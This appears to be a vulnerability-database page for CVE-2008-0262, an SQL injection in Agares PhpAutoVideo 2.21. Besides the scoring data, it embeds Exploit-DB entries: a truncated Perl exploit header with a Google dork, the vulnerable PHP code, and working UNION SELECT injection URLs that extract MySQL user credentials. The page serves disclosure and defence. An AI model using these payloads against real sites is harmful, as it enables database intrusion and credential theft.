CVE-2008-0262
published 2008-01-15CVE-2008-0262: SQL injection vulnerability in includes/articleblock.php in Agares PhpAutoVideo 2.21 allows remote attackers to execute arbitrary SQL commands via the…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in includes/articleblock.php in Agares PhpAutoVideo 2.21 allows remote attackers to execute arbitrary SQL commands via the articlecat parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| agares_media | phpautovideo | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)
exploitdb·2008-01-13
CVE-2008-0262 Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)
Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)
---
#!/usr/bin/perl
#Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit
#Bug Found by ka0x ( http://milw0rm.org/exploits/4901 ).. but sql injection works if we include in index.php bug file with sql injection..like this :
#http://192.168.1.102/video/UPLOAD/index.php?loadpage=./includes/articleblock.php&articlecat=[SQL]
#So.. we can execute sql query and we have user admin & pass in MD5
#Exploit by Pr0metheus
#Gr33tz to Gr33tz-Team.org
#Dork : "powered by AMCMS3"
###############################################
use LWP::UserAgent;
if(@ARGV!=3){
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n";
print "perl $0 \n";
print "default prefix - amcms\n";
print "-=-=-=-=-=-
Exploit-DB
Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)
exploitdb·2008-01-12
CVE-2008-0262 Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)
Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)
---
Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
bug found by ka0x
concat: ka0x01[at]gmail.com>
#from spain
vulnerability in /includes/articleblock.php
vuln code:
$cat = $_GET['articlecat'];
if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; }
else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; }
Your user needs to be root@localhost or administrator mysql, check:
http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/*
user and password from mysql.user:
http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*
# milw0rm.com [2008-01-
No writeups or analysis indexed.
http://www.securityfocus.com/bid/27258https://exchange.xforce.ibmcloud.com/vulnerabilities/39641https://www.exploit-db.com/exploits/4898https://www.exploit-db.com/exploits/4905http://www.securityfocus.com/bid/27258https://exchange.xforce.ibmcloud.com/vulnerabilities/39641https://www.exploit-db.com/exploits/4898https://www.exploit-db.com/exploits/4905
2008-01-15
Published